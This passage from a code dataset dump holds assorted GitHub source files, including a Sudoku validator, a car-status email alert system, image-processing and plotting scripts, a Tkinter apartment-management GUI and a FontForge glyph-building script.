with ThreadPoolExecutor(max_workers=3) as executor:\n results = executor.map(hello, range(3))\n for result in results:\n print(result)","repo_name":"huiboz/coding_practice","sub_path":"multiprocess_vs_multithread/multithread_executor.py","file_name":"multithread_executor.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7727737229","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n # check current validity only. 
not potential validity after filling.\n from collections import defaultdict\n \n rowDict, colDict, squareDict = defaultdict(set), defaultdict(set), defaultdict(set)\n ROWS, COLS = 9, 9\n for row in range(ROWS):\n for col in range(COLS):\n if board[row][col] == '.':\n continue\n if (board[row][col] in rowDict[row]) or (board[row][col] in colDict[col]) or (board[row][col] in squareDict[(row // 3, col // 3)]):\n return False\n rowDict[row].add(board[row][col])\n colDict[col].add(board[row][col])\n squareDict[(row // 3, col // 3)].add(board[row][col])\n return True","repo_name":"ameyxd/leetcode-interview-practice","sub_path":"36-valid-sudoku/36-valid-sudoku.py","file_name":"36-valid-sudoku.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72699314174","text":"import argparse\nimport ctypes\nimport json\nimport sys\nimport struct\n\n\ndef read_string(infile, length, encoding='shift-jis'):\n return infile.read(length).decode(encoding).strip('\\0')\n\ndef write_string(outfile, input, length, fill='\\0', encoding='shift-jis'):\n string_data = input[:length].encode(encoding)\n outfile.write(string_data)\n\n if len(input) < length:\n outfile.write(\"\".join([fill] * (length - len(string_data))).encode(encoding))\n\n# Cannonballers reader/writer\ndef reader_19(infile, song_count):\n song_entries = []\n\n for i in range(song_count):\n title = read_string(infile, 0x40)\n title_ascii = read_string(infile, 0x40)\n genre = read_string(infile, 0x40)\n artist = read_string(infile, 0x40)\n\n texture_title, texture_artist, texture_genre, texture_load, texture_list = struct.unpack(\"= CUR_STYLE_ENTRIES:\n outfile.write(struct.pack(\" Va informam ca masina dumneavoastra \" + car_details['Name'][0] + \"\" + \\\n \" cu descrierea \" + car_details['Description'][0] + \" are urmatoarea alerta:\" \\\n \" \" + alerta + \"\" \\\n + \"
\" \\\n \"


Acesta este un mesaj de alerta generat automat cu scopul de a va informa in privinta \" \\\n \"functionarii masinii dumneavoastra.
\" \\\n + \"Va rugam sa nu faceti reply la acest email!
\"\n\n part1 = MIMEText(text, 'html')\n msg.attach(part1)\n print(\"Message created\")\n server = smtplib.SMTP(self.mail_data['mail_server'], self.mail_data['mail_port'])\n print(\"server created, trying to create connection\")\n server.connect(self.mail_data['mail_server'], self.mail_data['mail_port'])\n print(\"SMTP connected\")\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(self.mail_data['mail_sender'], password)\n print(\"Logged in, trying to send mail\")\n server.sendmail(self.mail_data['mail_sender'], msg['To'], msg.as_string())\n print(\"Mail sent\")\n server.quit()\n\n def run(self):\n oldStatuses = self.statuses.copy()\n counter = 0\n while True:\n counter = counter + 1\n print('--- Loop number ' + str(counter) + ' ---')\n time.sleep(1)\n self.updateStatuses()\n changes = self.getChanges(oldStatuses)\n if changes['changes_df'].empty:\n print('No changes found')\n # print (self.statuses)\n else:\n print('Change found... Alerting... Please wait')\n iterator = 0\n for id in changes['cars']:\n alerta = changes['changes_df']['to'][iterator]\n print(alerta)\n self.sendMailTo(id + 1, alerta)\n iterator = iterator + 1\n\n oldStatuses = self.statuses.copy()\n\n def getStatuses(self):\n return self.statuses\n\n def printStatuses(self):\n print(self.statuses)\n\n\nif __name__ == \"__main__\":\n alert = Alert()\n alert.printStatuses()\n old = alert.getStatuses().copy()\n old.at[56, 'Status'] = \"ALERT\"\n old.at[2, 'Status'] = \"GOOD\"\n changes = alert.getChanges(old)\n print(changes)\n alert.run()\n","repo_name":"Katzuno/Alert-System","sub_path":"alert_sys.py","file_name":"alert_sys.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14934091298","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom .proc import to_chw, to_hwc\n\ndef show_stats(image, cfirst=False):\n \"\"\"prints statistic for an image\n --------\n image: np.array\n cfirst: bool, use cfirst=True if image format is [c,w,h]\n \"\"\"\n print(f'shape: {image.shape}')\n if not cfirst:\n if len(image.shape) == 2:\n image = np.expand_dims(image, axis=0)\n else:\n image = to_chw(image)\n props = pd.DataFrame({\n 'min': np.nanmin(image, (1,2)),\n 'max': np.nanmax(image, (1,2)),\n 'mean': np.nanmean(image, (1,2)),\n 'std': np.nanstd(image, (1,2)),\n 'pos': np.count_nonzero(np.nan_to_num(image, nan=-1.)>0, (1,2)),\n 'zero': np.count_nonzero(image==0, (1,2)),\n 'neg': np.count_nonzero(np.nan_to_num(image, nan=1.)<0, (1,2)),\n 'nan': np.count_nonzero(np.isnan(image), (1,2)),\n })\n print(props)\n\n\ndef show_hist(image, ax=None, cfirst=False, num_bins=256, start=None, end=None):\n \"\"\"creates histogram for 1-4 channel image\n --------\n image: np.array with [h,w,c]\n ax: plt.axis. Use f,ax = plt.subplots() and feed the ax here\n cfirst: bool. Use cfirst=1 if image is [c,h,w] format\n num_bins: int. default=256\n start: int or float (match image type). 
If not provided then np.min(image)\n end: default: np.max(image)\n \"\"\"\n color = ['r','g','b','k']\n if start == None: start = np.min(image)\n if end ==None: end = np.max(image)\n \n # if channel first, make it channel last\n if cfirst: image = to_hwc(image)\n # if ax not specified, create one\n if not ax: f,ax = plt.subplots(1,1)\n\n # 1ch image usually have only [w,h] or [w,h,1]\n if len(image.shape)==2 or image.shape[-1]==1:\n ax.hist(image.ravel(), num_bins, [start,end])\n else:\n for i in range(image.shape[-1]):\n ax.hist(image[:,:,i].ravel(), num_bins, [start,end],\n color=color[i], histtype='step', alpha=0.6)\n\n\n### PLOT ###\ndef show_example(img, mask):\n f,ax = plt.subplots(1,2,figsize=(10,5))\n if img.shape[-1] == 1:\n cmap = 'gray'\n else:\n cmap = None\n ax[0].imshow(img, cmap=cmap)\n if len(mask.shape)==3:\n mask = np.squeeze(mask, axis=-1)\n ax[1].imshow(mask, cmap='gray')\n plt.show()\n\ndef plot_metrics(history):\n sns.set(style='whitegrid')\n metric_list = [m for m in list(history.keys()) if m is not 'lr']\n size = len(metric_list)//2 # adjust vertical space to fit all metrics\n fig, axes = plt.subplots(size, 1, sharex='col', figsize=(20, size * 4))\n if size > 1:\n axes = axes.flatten()\n else:\n axes = [axes]\n \n for index in range(len(metric_list)//2):\n metric_name = metric_list[index]\n val_metric_name = metric_list[index+size]\n axes[index].plot(history[metric_name], label='Train %s' % metric_name)\n axes[index].plot(history[val_metric_name], label='Validation %s' % metric_name)\n axes[index].legend(loc='best', fontsize=16)\n axes[index].set_title(metric_name)\n if 'loss' in metric_name:\n axes[index].axvline(np.argmin(history[metric_name]), linestyle='dashed')\n axes[index].axvline(np.argmin(history[val_metric_name]), linestyle='dashed', color='orange')\n else:\n axes[index].axvline(np.argmax(history[metric_name]), linestyle='dashed')\n axes[index].axvline(np.argmax(history[val_metric_name]), linestyle='dashed', color='orange')\n\n plt.xlabel('Epochs', fontsize=16)\n sns.despine()\n plt.show()\n sns.set_theme()\n \n # print model performance\n bm_idx = np.argmin(history['val_loss'])\n print(f'best model at epoch: {bm_idx}')\n v_loss = history['val_loss'][bm_idx]\n v_iou = history[\"val_iou_score\"][bm_idx]\n v_f1 = history[\"val_f1-score\"][bm_idx]\n\n loss = history['loss'][bm_idx]\n iou = history[\"iou_score\"][bm_idx]\n f1 = history[\"f1-score\"][bm_idx]\n\n\n print(f'val loss: {v_loss:.4f}, val iou: {v_iou:.4f}, val f1: {v_f1:.4f}')\n print(f'loss: {loss:.4f}, iou: {iou:.4f}, f1: {f1:.4f}')\n print(f'best val IoU: {np.max(history[\"val_iou_score\"])}')","repo_name":"sandhi-artha/sn6_aug","sub_path":"lib/viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26424283729","text":"from tkinter import *\r\nimport Controller.Flat_Database as FD_M\r\nimport Controller.Bill_Database as BD_M\r\n\r\n\r\nclass Homepage:\r\n def __init__(self, window):\r\n self.window = window\r\n # ------------------Title----------------------\r\n Title = Label(window, text=\"HOME PAGE\", fg='Black', bg=\"#CAE9F5\", font=(\"Helvetica\", 40, 'bold'))\r\n Title.place(x=220, y=10)\r\n\r\n note = Label(window,\r\n text=\"Add titles for both new files 'Flat_Database' & 'Bill_database'. 
Click the above right buttons to create titles in the database\",\r\n fg='Black', bg=\"#CAE9F5\", font=(\"Helvetica\", 10))\r\n note.place(x=10, y=400)\r\n\r\n create_Flat_data_button = Button(window, text=\"Create title for flat profile\", bg=\"#ADECDF\",\r\n command=self.createFlatDatabase)\r\n create_Flat_data_button.place(x=400, y=200)\r\n\r\n create_bill_data_button = Button(window, text=\"Create title for bill section\", bg=\"#ADECDF\",\r\n command=self.createBilldatabase)\r\n create_bill_data_button.place(x=400, y=240)\r\n\r\n quit_button = Button(window, text=\"Quit\", bg=\"#ADECDF\", command=window.destroy)\r\n quit_button.place(x=400, y=300)\r\n\r\n # -----------------Sections---------------------\r\n lbl = Label(window, text=\"Select a database to visit in the list below:\", bg=\"#CAE9F5\", fg='Black',\r\n font=(\"Helvetica\", 14, 'bold'))\r\n lbl.place(x=10, y=100)\r\n\r\n flat_Profile_btn = Button(window, text=\"Flat Profile\", bg=\"#ADECDF\", fg='blue', command=self.goto_flatProfile)\r\n flat_Profile_btn.place(x=20, y=140)\r\n\r\n Bill_Section_btn = Button(window, text=\"Bill Section\", bg=\"#ADECDF\", fg='blue', command=self.goto_billSection)\r\n Bill_Section_btn.place(x=20, y=180)\r\n\r\n Add_bill_btn = Button(window, text=\"Add Bill\", bg=\"#ADECDF\", fg='blue', command=self.goto_AddBill)\r\n Add_bill_btn.place(x=20, y=220)\r\n\r\n Add_flat_members_btn = Button(window, text=\"Add flat members\", bg=\"#ADECDF\", fg='blue',\r\n command=self.goto_AddMember)\r\n Add_flat_members_btn.place(x=20, y=260)\r\n\r\n Service_Charge_btn = Button(window, text=\"Service Charge\", bg=\"#ADECDF\", fg='blue')\r\n Service_Charge_btn.place(x=20, y=300)\r\n\r\n Maintenance_btn = Button(window, text=\"Maintenance\", bg=\"#ADECDF\", fg='blue')\r\n Maintenance_btn.place(x=20, y=340)\r\n\r\n @staticmethod\r\n def createFlatDatabase():\r\n FD_M.Flat_database_create().add_title()\r\n FD_M.Flat_database_create().save_excel()\r\n\r\n @staticmethod\r\n def createBilldatabase():\r\n BD_M.Bill_database_create().add_title()\r\n BD_M.Bill_database_create().save_excel()\r\n\r\n def goto_flatProfile(self):\r\n self.window.destroy()\r\n\r\n def goto_billSection(self):\r\n self.window.destroy()\r\n\r\n def goto_AddMember(self):\r\n self.window.destroy()\r\n\r\n def goto_AddBill(self):\r\n self.window.destroy()\r\n\r\n\r\ndef present_Homepage_gui_frame():\r\n window = Tk()\r\n Homepage(window)\r\n windowWidth = window.winfo_reqwidth()\r\n windowHeight = window.winfo_reqheight()\r\n\r\n positionRight = int(window.winfo_screenwidth() / 3 - windowWidth / 2)\r\n positionDown = int(window.winfo_screenheight() / 3 - windowHeight / 2)\r\n\r\n window.title('Apartment Management System')\r\n window.geometry(\"840x450+{}+{}\".format(positionRight, positionDown))\r\n window['background'] = '#CAE9F5'\r\n window.mainloop()\r\n\r\n\r\npresent_Homepage_gui_frame()\r\n","repo_name":"IstinubAzad/CSE470-Project-AMS","sub_path":"View/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26509301091","text":"import face_recognition\nface_locations = face_recognition.face_locations(image)\n\n# https://github.com/ageitgey/face_recognition/blob/master/examples/find_faces_in_picture.py\nfrom PIL import Image\n\nprint(\"I found {} face(s) in this photograph.\".format(len(face_locations)))\n\nfor face_location in face_locations:\n\n # Print the location of each face in this image\n top, right, bottom, 
left = face_location\n print(\"A face is located at pixel location Top: {}, Left: {}, Bottom: {}, Right: {}\".format(top, left, bottom, right))\n\n # You can access the actual face itself like this:\n face_image = image[top:bottom, left:right]\n fig, ax = plt.subplots(1,1, figsize=(5, 5))\n plt.grid(False)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n ax.imshow(face_image)\n","repo_name":"NAIST-SE/ReuseJupyterNotebook","sub_path":"extracted files example/644036/16880/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10259667538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 17 13:49:56 2023\n\n@author: andre\n\"\"\"\n\nimport functions\nimport matplotlib.pyplot as plt\nimport time\nimport pandas as pd\nimport numpy as np\nimport joblib\n# Start the timer\nimport os\n\nfrom PIL import Image\n#%%\nstart_time = time.time()\n\ncurrent_directory = os.getcwd()\n\n\nsubdirectory_name = \"plots\"\n\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\nimage_path = os.path.join(subdirectory_path , \"cropped.jpeg\") # Replace with your PNG image path\n\nimage = Image.open(image_path)\nwidth, height = image.size\n\nrows = height \ncols = width\n\nprint(rows, cols)\nmatrix = functions.png_to_matrix(image_path) \ncmap=functions.create_green_to_blue_cmap()\nplt.figure()\nfunctions.plot_heatmap(matrix, cmap, vmin=1, vmax=3)\nplt.show()\n\n\n#fracs = functions.count_value_in_kernel2(matrix, 40)\n\n\nend_time = time.time()\nelapsed_time = end_time - start_time\nprint(f\"Elapsed time: {elapsed_time} seconds\")\n\n\n#%%\n\nfrom PIL import Image\n\ndef png_to_image(image):\n rgb_image = image.convert(\"RGB\")\n width, height = rgb_image.size\n\n output_image = Image.new(\"RGB\", (width, height))\n\n for y in range(height):\n for x in range(width):\n r, g, b = rgb_image.getpixel((x, y))\n \n diff_rg = abs(r - g)\n diff_gb = abs(g - b)\n\n # Categorize the pixel based on the differences\n if diff_rg > 20 and diff_gb > 15:\n if b > max(r, g):\n color = (0, 0, 255) # Blue\n else:\n color = (0, 255, 0) # Green\n else:\n color = (0, 0, 0) # Black\n\n output_image.putpixel((x, y), color)\n\n return output_image\n\n\nurrent_directory = os.getcwd()\n\n\nsubdirectory_name = \"plots\"\n\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\nimage_path = os.path.join(subdirectory_path , \"knipsel2.PNG\") # Replace with your PNG image path\n\nimage = Image.open(image_path)\nwidth, height = image.size\n\nprint(width, height)\n\noutput_image = png_to_image(image)\noutput_image.show() # Display the resulting image\n\n\n#%%\nfrom PIL import Image\n\n\ndef reduce_resolution(image, plate_width , plate_height):\n\n resized_image = image.resize((plate_width, plate_height), resample=Image.NEAREST)\n\n return resized_image\n\nimport numpy as np\nfrom PIL import Image\nfrom scipy.ndimage import median_filter\n\ndef median_filter_pil(image, kernel_size):\n # Convert the PIL image to a NumPy array\n image_array = np.array(image)\n\n # Apply median filtering to the image array\n filtered_array = median_filter(image_array, size=kernel_size)\n \n # Convert the filtered array back to uint8 data type\n filtered_array = filtered_array.astype(np.uint8)\n\n # Convert the filtered array back to a PIL image\n filtered_image = Image.fromarray(filtered_array)\n\n return 
filtered_image\n\ndef median_filter_custom(image, kernel_size):\n # Create a copy of the original image\n filtered_image = image.copy()\n\n # Get the dimensions of the image\n width, height = image.size\n\n # Calculate the padding size for the kernel\n padding = kernel_size // 2\n\n # Iterate over each pixel in the image\n for y in range(padding, height - padding):\n for x in range(padding, width - padding):\n # Extract the neighborhood around the current pixel\n neighborhood = image.crop((x - padding, y - padding, x + padding + 1, y + padding + 1))\n\n # Get the pixel values within the neighborhood\n pixels = list(neighborhood.getdata())\n\n # Calculate the median value within the neighborhood\n median = sorted(pixels)[len(pixels) // 2]\n\n # Set the pixel value in the filtered image to the median\n filtered_image.putpixel((x, y), median)\n\n return filtered_image\n\nnew_ = reduce_resolution(output_image, 320 , 320)\nnew_.show()\nnew_=median_filter_custom(new_, 6)\nnew_.show()\nnew_ = reduce_resolution(new_, 16 , 16)\nnew_.show()\n\n#%%\n\ndef png_to_image2(image):\n rgb_image = image.convert(\"RGB\")\n width, height = rgb_image.size\n \n print(width, height)\n\n output_image = Image.new(\"RGB\", (width, height))\n\n for y in range(height):\n for x in range(width):\n r, g, b = rgb_image.getpixel((x, y))\n #print(r, g, b)\n \n diff_rg = abs(r - g)\n diff_gb = abs(g - b)\n #print(diff_rg, diff_rg, r, g, b)\n\n # Categorize the pixel based on the differences\n if diff_gb > 30:\n if b > max(r, g):\n color = (0, 0, 255) # Blue\n else:\n color = (0, 255, 0) # Green\n else:\n color = (0, 0, 0) # Black\n\n output_image.putpixel((x, y), color)\n\n return output_image\n\noutput_image2 = png_to_image2(new_)\noutput_image2.show() \n\n#%%\n\n\n\ndf_vlinder = pd.read_csv(os.path.join(subdirectory_path,'big_2020_09.csv' ))\ndf_vlinder=df_vlinder[df_vlinder['Vlinder']=='vlinder05']\ndf_vlinder=df_vlinder.reset_index(drop=True)\nplt.figure()\ndf_vlinder.PRECIP_QUANTITY.plot()\nplt.figure()\ndf_vlinder.t2m_inca.plot()\nplt.figure()\ndf_vlinder.wind_speed_inca.plot()\n\n\n#%%\nimport functions\n\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"knipsel2.PNG\") # Replace with your PNG image path\n\nimage = Image.open(image_path)\nplot = functions.run_module(image, 4)\nplot.show()\n\n\n\n\n\n#%%%\n\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas4.png\") \n\nimage = Image.open(image_path)\nimage.show()\nfrom PIL import Image\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray\n\ndef edge_detection(image):\n # Convert the image to grayscale\n gray_image = image.convert('L')\n\n # Convert PIL image to NumPy array\n image_array = np.array(gray_image)\n\n # Convert grayscale image to RGB by duplicating the single channel\n image_rgb = np.stack((image_array,) * 3, axis=-1)\n\n # Perform Canny edge detection\n edges = canny(rgb2gray(image_rgb))\n\n # Convert the edges array back to PIL image\n edges_image = Image.fromarray(edges.astype('uint8') * 255)\n\n return edges_image\n\n\ned = edge_detection(image)\ned.show()\n\n\nfrom PIL import Image, ImageOps, ImageDraw\n\ndef remove_region_within_edges(image, 
edges):\n # Convert the edges image to grayscale\n edges_gray = edges.convert('L')\n\n # Create a blank mask image with the same size as the edges\n mask = Image.new('L', edges_gray.size, 0)\n\n # Draw the region within the edges on the mask\n draw = ImageDraw.Draw(mask)\n draw.polygon(edges_gray.getbbox(), fill=255)\n\n # Apply the mask to the original image\n result = Image.composite(image, Image.new('RGB', image.size), mask)\n\n return result\n\n\nremove_object_with_edges(image, ed).show()\n\n\n#%%\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas2.png\") \n\nimport cv2\nimport numpy as np\n\ndef extract_object(image_path):\n # Load the image\n image = cv2.imread(image_path)\n\n # Convert the image from BGR to HSV color space\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # Define the lower and upper bounds for the object color in HSV\n lower_color = np.array([0, 50, 50]) # Adjust these values based on the object color\n upper_color = np.array([360, 255, 255]) # Adjust these values based on the object color\n\n # Create a mask for the object using color segmentation\n mask = cv2.inRange(hsv, lower_color, upper_color)\n\n # Apply the mask to the original image\n extracted_object = cv2.bitwise_and(image, image, mask=mask)\n\n return extracted_object\n\n# Example usage\nextracted_image = extract_object(image_path)\ncv2.imshow('Extracted Object', extracted_image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#%%\n\n\n\nimport cv2\nimport numpy as np\n\ndef remove_white_object(image, threshold):\n # Convert PIL image to OpenCV format\n image_cv = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n\n # Convert image to grayscale\n gray_image = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)\n\n # Create a binary mask of white pixels\n _, mask = cv2.threshold(gray_image, threshold, 255, cv2.THRESH_BINARY)\n\n # Perform inpainting\n result = cv2.inpaint(image_cv, mask, 3, cv2.INPAINT_TELEA)\n\n # Convert back to PIL image format\n result_pil = Image.fromarray(cv2.cvtColor(result, cv2.COLOR_BGR2RGB))\n\n return result_pil\n\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas.png\") \n\nimage = Image.open(image_path)\nimage.show()\n\nremove_white_object(image, 150).show()\n\n\n\n#%%%\n\n\n\nimport cv2\nimport numpy as np\n\ndef warp_colored_region(image):\n # Convert image to HSV color space\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # Define lower and upper color thresholds for color-based segmentation\n lower_color = np.array([0, 50, 50]) # Adjust these values based on the color range of the region\n upper_color = np.array([30, 255, 255]) # Adjust these values based on the color range of the region\n\n # Create a mask of the colored region using color segmentation\n mask = cv2.inRange(hsv, lower_color, upper_color)\n\n # Find contours in the mask\n contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Find the largest contour (assuming it represents the colored region)\n largest_contour = max(contours, key=cv2.contourArea)\n\n # Find the four corners of the largest contour\n epsilon = 0.1 * cv2.arcLength(largest_contour, True)\n corners = 
cv2.approxPolyDP(largest_contour, epsilon, True)\n print(corners)\n if len(corners) >= 4:\n # Create a target square shape for warping\n target_size = 500 # Adjust the size as desired\n target_shape = np.float32([[0, 0], [target_size, 0], [target_size, target_size], [0, target_size]])\n\n # Find the perspective transformation matrix using homography\n transform_matrix, _ = cv2.findHomography(corners, target_shape)\n\n # Warp the image into the square format\n warped_image = cv2.warpPerspective(image, transform_matrix, (target_size, target_size))\n\n return warped_image\n else:\n print(\"Insufficient corners detected. Unable to warp the image.\")\n return None\n\n# Example usage\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas3.png\") \nimage = cv2.imread(image_path)\nwarped_image = warp_colored_region(image)\nif warped_image is not None:\n cv2.imshow('Warped Image', warped_image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\n#%%\n\n\n\n\n","repo_name":"ACovaci99/I_Love_Science_Fest","sub_path":"back_end/develop_script.py","file_name":"develop_script.py","file_ext":"py","file_size_in_byte":11497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71334055615","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom read_prep_data import curved_power_law, power_law\nfrom scipy.stats import chi2\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.rcParams[\"axes.grid\"] = False\n\nmajorticklength=2.5\nminorticklength=2\ntickwidth=0.5\n\ndef plot_sed(freq, flux, fluxerr, fit_params, coord_src, outpath):\n fig, ax = plt.subplots(1,1)\n\n nu = np.geomspace(\n np.min(freq),\n np.max(freq),\n 100\n )\n\n ax.errorbar(\n freq,\n flux,\n yerr=fluxerr,\n ls='None',\n marker='.'\n )\n\n legend = False\n\n if fit_params is not None:\n legend = True\n \n if len(fit_params) == 2:\n\n ax.plot(\n nu,\n power_law(nu, *fit_params),\n ls='--',\n color='red',\n label=f\"Power-law, r$\\alpha$ {fit_params[1]:.3f}\"\n )\n elif len(fit_params) == 3: \n ax.plot(\n nu,\n curved_power_law(nu, *fit_params),\n ls=':',\n color='green',\n label=f'Curved power-law, r$q$ {fit_params[2]:.3f}'\n )\n\n\n if legend is True:\n ax.legend()\n\n ax.loglog()\n ax.set(\n xlabel='Frequency (MHz)',\n ylabel='Integrated Flux (Jy)',\n title=coord_src.tex\n )\n ax.tick_params(\n axis=\"both\", which=\"major\", direction=\"in\", length=majorticklength, width=tickwidth, pad=5\n )\n ax.tick_params(\n axis=\"both\", which=\"minor\", direction=\"in\", length=minorticklength, width=tickwidth\n )\n\n fig.tight_layout()\n fig.savefig(f\"{outpath}/{coord_src}.png\")\n plt.close(fig)\n","repo_name":"astrokatross/drII_plotting","sub_path":"sed_plotting/plotting_seds.py","file_name":"plotting_seds.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20187809322","text":"#!/usr/bin/env python2\n#coding: utf-8\n\nimport fontforge;\nimport psMat;\n\nbhat_consonants = [\"a\", \"ta\", \"ka\", \"xa\", \"sa\", \"na\", \"ma\", \"da\", \"ga\", \"pa\", \"ba\", \"ha\", \"ca\", \"za\", \"la\", \"ra\", \"ja\", \"ya\", \"wa\", \"dha\", \"kha\", \"gha\", \"pha\", \"bha\", \"tra\", \"dra\", \"nra\", \"lra\", \"cra\"];\nbhat_vowels = [\"i\", \"u\", \"aa\", \"ii\", \"uu\", \"e\" ,\"o\", \"ai\", 
\"au\", \"novowel\"];\n\ngldir = \"../Traditional/glyphs\"\n\ndef create_characters(font):\n for cp in range(0x0000, 0x0080): #基本ラテン字\n font.createChar(cp);\n\n for cp in [0x1e0c, 0x1e0d, 0x1e36, 0x1e37, 0x1e46, 0x1e47, 0x1e62, 0x1e63, 0x1e6c, 0x1e6d, 0x00c1, 0x00cd, 0x00da, 0x00e1, 0x00ed, 0x00fa]:\n font.createChar(cp);\n\ndef create(font): \n for cp in bhat_consonants: \n font.createChar(-1, \"bhat_%s\" % cp);\n font[\"bhat_%s\" % cp].importOutlines(\"%s/%s.svg\" % (gldir, cp));\n font[\"bhat_%s\" % cp].right_side_bearing = 0;\n font[\"bhat_%s\" % cp].left_side_bearing = 0;\n\n for cp in bhat_vowels:\n font.createChar(-1, \"bhat_%s_mark\" % cp);\n font[\"bhat_%s_mark\" % cp].importOutlines(\"%s/%s.svg\" % (gldir, cp));\n font[\"bhat_%s_mark\" % cp].right_side_bearing = 0;\n font[\"bhat_%s_mark\" % cp].left_side_bearing = 0;\n\n bar_left = {\"i\": 270.06, \"ii\": 350.75,\"au\": 530.06}\n \n for cns in bhat_consonants:\n for vwl in bhat_vowels:\n if vwl == \"a\":\n pass;\n elif vwl == \"novowel\":\n font.createChar(-1, \"bhat_%s\" % cns[0:-1]);\n font[\"bhat_%s\" % (cns[0:-1])].addReference(\"bhat_%sa\" % cns[0:-1]);\n font[\"bhat_%s\" % (cns[0:-1])].addReference(\"bhat_novowel_mark\", psMat.translate(font[\"bhat_%s\" % cns].width / 3, 0));\n \n elif vwl == \"i\" or vwl == \"ii\" or vwl == \"au\":\n font.createChar(-1, \"bhat_%s%s\" % (cns[0:-1], vwl));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%sa\" % cns[0:-1]);\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%s_mark\" % vwl, psMat.translate(font[\"bhat_%s\" % cns].width - bar_left[vwl], 0));\n\n elif vwl == \"o\":\n font.createChar(-1, \"bhat_%s%s\" % (cns[0:-1], vwl));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%sa\" % cns[0:-1], psMat.translate(260, 0));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%s_mark\" % vwl);\n \n else:\n font.createChar(-1, \"bhat_%s%s\" % (cns[0:-1], vwl));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%sa\" % cns[0:-1]);\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%s_mark\" % vwl, psMat.translate(font[\"bhat_%s\" % cns].width / 3, 0));\n\n for cp in [\"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\"]:\n font[cp].addReference(\"bhat_%s\" % cp); \n font[cp.upper()].addReference(\"bhat_%s\" % cp);\n\n for cp in [\"a\", \"i\", \"u\", \"e\", \"o\"]:\n font[cp].addReference(\"bhat_%s\" % cp);\n font[cp.upper()].addReference(\"bhat_%s\" % cp);\n\n\n font.addLookup(\"ligature1\", \"gsub_ligature\", (), ((\"ccmp\",((\"DFLT\",(\"dflt\")), (\"latn\",(\"dflt\")))),));\n font.addLookupSubtable(\"ligature1\", \"ligature1-1\");\n\n for nm in [\"ai\", \"au\", \"dh\", \"kh\", \"gh\", \"ph\", \"bh\"]:\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0], nm[1]));\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0].upper(), nm[1]));\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0], nm[1].upper()));\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0].upper(), nm[1].upper()));\n\n for el in [(\"uni1E0C\", \"dr\"), 